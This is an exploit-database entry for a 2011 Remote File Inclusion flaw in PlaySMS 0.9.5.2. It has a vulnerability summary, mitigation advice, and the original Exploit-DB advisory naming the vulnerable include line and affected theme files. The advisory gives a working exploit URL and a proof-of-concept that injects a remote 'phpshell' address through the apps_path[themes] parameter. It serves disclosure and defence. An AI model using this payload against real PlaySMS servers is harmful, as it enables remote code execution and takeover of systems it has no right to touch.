PlaySMS - exploit.company

vendor:

PlaySMS

by:

NoGe

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: PlaySMS

Affected Version From: 0.9.5.2

Affected Version To: 0.9.5.2

Patch Exists: YES

Related CWE: N/A

CPE: a:playsms:playsms:0.9.5.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

PlaySMS <= Remote File Inclusion Vulnerability

PlaySMS version 0.9.5.2 is vulnerable to Remote File Inclusion (RFI) vulnerability. This vulnerability affects all the files such as web/plugin/themes/default/page_forgot.php, web/plugin/themes/default/page_login.php, web/plugin/themes/default/page_noaccess.php, web/plugin/themes/default/page_register.php, web/plugin/themes/km2/page_noaccess.php, web/plugin/themes/work2/page_forgot.php, web/plugin/themes/work2/page_login.php, web/plugin/themes/work2/page_noaccess.php, web/plugin/themes/work2/page_register.php. An attacker can exploit this vulnerability by sending a malicious URL to the victim. The malicious URL contains the RFI payload which can be used to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. The application should also be configured to use the least privilege principle.

Source

Exploit-DB raw data:

=============================================================================================================
 
  [o] PlaySMS <= Remote File Inclusion Vulnerability
  
       Software : PlaySMS ver 0.9.5.2
       Vendor   : http://playsms.org/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/

=============================================================================================================

  [o] Vulnerability

       <?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

       affected all this files

       web/plugin/themes/default/page_forgot.php
       web/plugin/themes/default/page_login.php
       web/plugin/themes/default/page_noaccess.php
       web/plugin/themes/default/page_register.php
       web/plugin/themes/km2/page_noaccess.php
       web/plugin/themes/work2/page_forgot.php
       web/plugin/themes/work2/page_login.php
       web/plugin/themes/work2/page_noaccess.php
       web/plugin/themes/work2/page_register.php


  [o] Exploit

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


  [o] PoC

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

=============================================================================================================

  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

  [o] September 05 2011 - Papua, Indonesia